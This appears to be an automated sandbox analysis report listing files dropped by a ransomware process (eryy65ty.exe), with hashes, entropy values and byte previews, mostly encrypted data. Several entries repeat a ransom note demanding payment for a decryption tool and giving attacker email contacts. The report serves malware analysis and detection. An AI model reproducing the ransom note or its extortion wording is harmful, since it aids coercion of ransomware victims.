                                                                                                    Preview:..L.wkg+...n@.Wl....O.0\S._W.)...dW!P...;o5.C.o.$..ZUv...H.-..ocked=1.........V..(rEi.a.&.dV..%...g:}.....?....e..$W.`..".&.4.qp4.2.:...z..(....j`TV....\........!.9...h$3.u..>Vm7......A:...r$us........s..N...-....l .@.......>| ...C.v%i../pqm......3..........%............*.^..R.O3..3,.I|.........4.G.MBw.7~..-..w..?.N0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):571
                                                                                                    Entropy (8bit):7.619774695937569
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:otzHd1271gxBVch8c3jeshgLtWmq94W50vRzSlAkCR/PXomn:oRd1++u8c3jeAktWmqyW50vBEhCSm
                                                                                                    MD5:A38E9D539FA03C1C70B4E85A5A7BE7DA
                                                                                                    SHA1:5229DBAB40FBBC49E348EA87CBC85380E57CF8C1
                                                                                                    SHA-256:68A459B7B503DB0D1530B4F6CD77DF0DF3DA0825159EC75AC0BC86559EFE6F2E
                                                                                                    SHA-512:E9CA685CDCCF10925FDB283018E145A48BAEC348B3AE3DCE1ADD469E9ECC0CBF9F9E678474C98B61F3356524FD4D76275E6B3954F1C00E51A4E785DE554F79CD
                                                                                                    Malicious:true
                                                                                                    Preview:.R...IN..cigz.%CK.7h....%...MQ)...!...P..`m.4.*..3..S'e%.>..........P.,......1.,...2.E....u...g.....V..#.0.1o......+ .U.b.7..N<.wN.//..5aZRNlG>T..,.1..!P.....Y.....f.B.@.m0$.V..u......7.,y...<bD..c@...K%...&bY...j.;...Q.7../.....v.R>.(..U...h.....P.....Bt.H.6@..Xz..L8.B.Rt..5L.._V....ap1.O......r%..Ns.AKh...(....1o.'.."pd..Z.0.F.F.h..W..XX.....E..`e.X.....;a+.<..c.=..eg.....m......=.}Y..Fl8z&.......t.`gv>S.B x.4..1....L\.>.m.[.`M.gz..a...N..r....z........+w.h..m..u....H>.E...t..}...jFy....G.A^/<b..gu..ZP..l.*W...TVgwS.*%.!.?.&./0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):571
                                                                                                    Entropy (8bit):7.619774695937569
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:otzHd1271gxBVch8c3jeshgLtWmq94W50vRzSlAkCR/PXomn:oRd1++u8c3jeAktWmqyW50vBEhCSm
                                                                                                    MD5:A38E9D539FA03C1C70B4E85A5A7BE7DA
                                                                                                    SHA1:5229DBAB40FBBC49E348EA87CBC85380E57CF8C1
                                                                                                    SHA-256:68A459B7B503DB0D1530B4F6CD77DF0DF3DA0825159EC75AC0BC86559EFE6F2E
                                                                                                    SHA-512:E9CA685CDCCF10925FDB283018E145A48BAEC348B3AE3DCE1ADD469E9ECC0CBF9F9E678474C98B61F3356524FD4D76275E6B3954F1C00E51A4E785DE554F79CD
                                                                                                    Malicious:false
                                                                                                    Preview:.R...IN..cigz.%CK.7h....%...MQ)...!...P..`m.4.*..3..S'e%.>..........P.,......1.,...2.E....u...g.....V..#.0.1o......+ .U.b.7..N<.wN.//..5aZRNlG>T..,.1..!P.....Y.....f.B.@.m0$.V..u......7.,y...<bD..c@...K%...&bY...j.;...Q.7../.....v.R>.(..U...h.....P.....Bt.H.6@..Xz..L8.B.Rt..5L.._V....ap1.O......r%..Ns.AKh...(....1o.'.."pd..Z.0.F.F.h..W..XX.....E..`e.X.....;a+.<..c.=..eg.....m......=.}Y..Fl8z&.......t.`gv>S.B x.4..1....L\.>.m.[.`M.gz..a...N..r....z........+w.h..m..u....H>.E...t..}...jFy....G.A^/<b..gu..ZP..l.*W...TVgwS.*%.!.?.&./0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):292
                                                                                                    Entropy (8bit):7.189599774790994
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:R6BGJ2z8+HASudqwijXNclVI3mE+9JhVZYyNGl1blVkASn:Qy2krjoMI3mE+9J1zNs1blFSn
                                                                                                    MD5:5653440AC8CEC32F36999E672E30A35F
                                                                                                    SHA1:1DA7E4869460AFD83CF0305F7A2A7C8081F68039
                                                                                                    SHA-256:0FA028312B4F521A08D254C360CF066441087B73054C934F09612A2EFD81E9F4
                                                                                                    SHA-512:078859AC1641F1926909EF6F057A4C0E2FB988CD6B472A61D439A537E68BD0B40D8E6E69EFB1A5ABE22C41F836191838C0FAB7170C5CE98FA9D4FA4BD6C999E8
                                                                                                    Malicious:false
                                                                                                    Preview:......F..i.'.............|..*...3........)Q..$.8..R}.F.a....{~m.> 6............XF..}J.:.................?.2..8..`]....57....".Ys2.0.979...... .qIM|.{.....(..j"...c.M......8nt...........6.%..1..E.0yQZi.E...5..A.^%.....Dnl2...`:...>K..E....=.6...C......).nQ"...v..N....0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.826077810115081
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:BJ/z1js23K6ugSn6TrH5eQt0ePkrAxXrQlZmHknuDgXhS8oHIoQTePjgXCu3tefm://z1/3kn4rZrBPJdknUgxS8o6T0MX7Mm
                                                                                                    MD5:71CD4AE508CF5D1B534030A8C45BA54D
                                                                                                    SHA1:0D54C83DE1CB24D8A42F327893CC19F72A2EF41E
                                                                                                    SHA-256:84982F2DE8F6F4F96EF50FA44047D12BA62D549CDB496BC8B11269F4E7098C3A
                                                                                                    SHA-512:950160DAE2C2E2B62D6088B79D81BBD518B80F48BAF628DC22BEFF6F35F4561FEE488C5B90CE4615B356559994855DE40915CEFF562E5F793E9828101BD8C3B1
                                                                                                    Malicious:false
                                                                                                    Preview:y.r.Bo......`......z]OH+c}.......,..p._.Zp...>.rN...e.<y..[.x..w..[A.Z.3.C...f.u....T......]....1.Z.M.o..4..1.p4k...a.^W......^2Q..3.x...@.5..p...(~.y.R..z...p.^.q.b......at....Q..{.n...>..[.i|.__C.6?..F...:.)s..U~.=...,...9U...>mz..x9........J....ji....:..\z...56(^.O.e].2u2j...}Zc.MZn.D.;i...s...~.>.;.9..d....E.t.wbPQ....b.,.W.J..5._.7.....m .....Rr.eCM'.0+..V.....Lk.P......j$k=,.Us...t...%.<.n.9.X..,,.q.V|.'..Q'...Y....V..*..wn.#..f..B].....1M...[...\......D...V.`.`.J.K.`.?/i..&.nK.$....'vPQ.u.Zn?L{Y..R[=K.l..Z<..%..5.k......3G.Md.}/.S2..M.......v.v.@6...O..).r]..f...'.x.E........u....j....z...t<.P.dM_..=u$........a...w...pG1Q..kU....3.u....e.......K.Px...A....%..n.`.....m3e.P..vu.Ai.DnM1|hh.....G.ZOc.[..1.8...:O..:..Yy.tr...^.d...Z.r.E.~MK...+Z4...*._5....H8.B....=.&..B...p.....&.?.oE....?...N9....q3.yY....<.^.y.+#.!.A.!iC.4f).I.D.P/9..P4T..1.Dt..et...Q..]Gw.[....).7..A..0.?........M.m.....&....../P......<...Vu.6`~.(.z...`nFOW9V.hf....W).
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.826077810115081
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:BJ/z1js23K6ugSn6TrH5eQt0ePkrAxXrQlZmHknuDgXhS8oHIoQTePjgXCu3tefm://z1/3kn4rZrBPJdknUgxS8o6T0MX7Mm
                                                                                                    MD5:71CD4AE508CF5D1B534030A8C45BA54D
                                                                                                    SHA1:0D54C83DE1CB24D8A42F327893CC19F72A2EF41E
                                                                                                    SHA-256:84982F2DE8F6F4F96EF50FA44047D12BA62D549CDB496BC8B11269F4E7098C3A
                                                                                                    SHA-512:950160DAE2C2E2B62D6088B79D81BBD518B80F48BAF628DC22BEFF6F35F4561FEE488C5B90CE4615B356559994855DE40915CEFF562E5F793E9828101BD8C3B1
                                                                                                    Malicious:false
                                                                                                    Preview:y.r.Bo......`......z]OH+c}.......,..p._.Zp...>.rN...e.<y..[.x..w..[A.Z.3.C...f.u....T......]....1.Z.M.o..4..1.p4k...a.^W......^2Q..3.x...@.5..p...(~.y.R..z...p.^.q.b......at....Q..{.n...>..[.i|.__C.6?..F...:.)s..U~.=...,...9U...>mz..x9........J....ji....:..\z...56(^.O.e].2u2j...}Zc.MZn.D.;i...s...~.>.;.9..d....E.t.wbPQ....b.,.W.J..5._.7.....m .....Rr.eCM'.0+..V.....Lk.P......j$k=,.Us...t...%.<.n.9.X..,,.q.V|.'..Q'...Y....V..*..wn.#..f..B].....1M...[...\......D...V.`.`.J.K.`.?/i..&.nK.$....'vPQ.u.Zn?L{Y..R[=K.l..Z<..%..5.k......3G.Md.}/.S2..M.......v.v.@6...O..).r]..f...'.x.E........u....j....z...t<.P.dM_..=u$........a...w...pG1Q..kU....3.u....e.......K.Px...A....%..n.`.....m3e.P..vu.Ai.DnM1|hh.....G.ZOc.[..1.8...:O..:..Yy.tr...^.d...Z.r.E.~MK...+Z4...*._5....H8.B....=.&..B...p.....&.?.oE....?...N9....q3.yY....<.^.y.+#.!.A.!iC.4f).I.D.P/9..P4T..1.Dt..et...Q..]Gw.[....).7..A..0.?........M.m.....&....../P......<...Vu.6`~.(.z...`nFOW9V.hf....W).
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.844308447720017
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Xa89X4vmSCAi3rBnrTRdoPn45Ql/TXcixK93paS0y/YaAWcBq:Crw3FEPyWrcL18b5HWcBq
                                                                                                    MD5:2E64534201C27DC1A0B9371DAA3E70AE
                                                                                                    SHA1:2C3BFB30ECD296C7887AA3E3D553652D7521EEC9
                                                                                                    SHA-256:0A2568BEFE9F482957EBCCBF4411643656C4BA248ACB5017F5D35C445B5557E2
                                                                                                    SHA-512:48C22449D24837649B991C38B22D14222F54D7307FEDD24EEA46B144221A4620AEE0B69AD4B1E09D06449CA700A9548B98B4E24F5E32E2BBCE92401C79030662
                                                                                                    Malicious:true
                                                                                                    Preview:....ud..]b..........q!..=.O...s..!.F...$c..'B..z..U}.^..u.@.".l...f....)4.t..]&..Z...F..gf^.m....V.........j.....kQ..9.D.\.....|...j4......n@......Y.%..1.7..:..o..F..9B. Z.....1..$.6OG.n.u.[{...9|"..o..Up..LyQ.6X.7...Y.I.LT..\.....cZ..r?..x..v9~..?J..hWx5.^ZT...7A.....A..,...@..9..VJ.1f..4.f....8<..U..N[9....J{.fw.gw".hQ......U5.3.o....h....t$.\.Z.]^....c.u.Q.&...+.D}.....i+.....O+.L..... ..%..l.Ny..nj...@f.?|.s..m....?..ZO.$T..a. .1b...\...~...?...Y.l\..R8./..).<....2.....'p,...-.rx>G....-.F....w.....Zg.&..T//.?{.s...z....z..~...=.{.'..m..;.\..m.%9...x.3eY.a...v....tPC..f........D...g)kz.N.R.>....!.".`Cc.......eI.N..l.](V.Q$..@e}B.X...~{..o.N.....sB.|....Td...$J........=".8._.x...aD...e..K..B.J<Q.'....Fb.p.~.R2O..*..~..kVjb..(.......=.....wwlD.........._..E6Y(...U.F..<.O.....E.....F..~<r..X...$UOi&......-V....2..._L..O.t@..j&.}m...T..:.4...].....k=9.I|s.2.}..7By$!v.Nw.."..Xmbe...[$...a.f......D]hZ....!_....z.s`Wg.9.(.G,....L.._c....v&2.=...W..
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.844308447720017
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Xa89X4vmSCAi3rBnrTRdoPn45Ql/TXcixK93paS0y/YaAWcBq:Crw3FEPyWrcL18b5HWcBq
                                                                                                    MD5:2E64534201C27DC1A0B9371DAA3E70AE
                                                                                                    SHA1:2C3BFB30ECD296C7887AA3E3D553652D7521EEC9
                                                                                                    SHA-256:0A2568BEFE9F482957EBCCBF4411643656C4BA248ACB5017F5D35C445B5557E2
                                                                                                    SHA-512:48C22449D24837649B991C38B22D14222F54D7307FEDD24EEA46B144221A4620AEE0B69AD4B1E09D06449CA700A9548B98B4E24F5E32E2BBCE92401C79030662
                                                                                                    Malicious:false
                                                                                                    Preview:....ud..]b..........q!..=.O...s..!.F...$c..'B..z..U}.^..u.@.".l...f....)4.t..]&..Z...F..gf^.m....V.........j.....kQ..9.D.\.....|...j4......n@......Y.%..1.7..:..o..F..9B. Z.....1..$.6OG.n.u.[{...9|"..o..Up..LyQ.6X.7...Y.I.LT..\.....cZ..r?..x..v9~..?J..hWx5.^ZT...7A.....A..,...@..9..VJ.1f..4.f....8<..U..N[9....J{.fw.gw".hQ......U5.3.o....h....t$.\.Z.]^....c.u.Q.&...+.D}.....i+.....O+.L..... ..%..l.Ny..nj...@f.?|.s..m....?..ZO.$T..a. .1b...\...~...?...Y.l\..R8./..).<....2.....'p,...-.rx>G....-.F....w.....Zg.&..T//.?{.s...z....z..~...=.{.'..m..;.\..m.%9...x.3eY.a...v....tPC..f........D...g)kz.N.R.>....!.".`Cc.......eI.N..l.](V.Q$..@e}B.X...~{..o.N.....sB.|....Td...$J........=".8._.x...aD...e..K..B.J<Q.'....Fb.p.~.R2O..*..~..kVjb..(.......=.....wwlD.........._..E6Y(...U.F..<.O.....E.....F..~<r..X...$UOi&......-V....2..._L..O.t@..j&.}m...T..:.4...].....k=9.I|s.2.}..7By$!v.Nw.."..Xmbe...[$...a.f......D]hZ....!_....z.s`Wg.9.(.G,....L.._c....v&2.=...W..
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
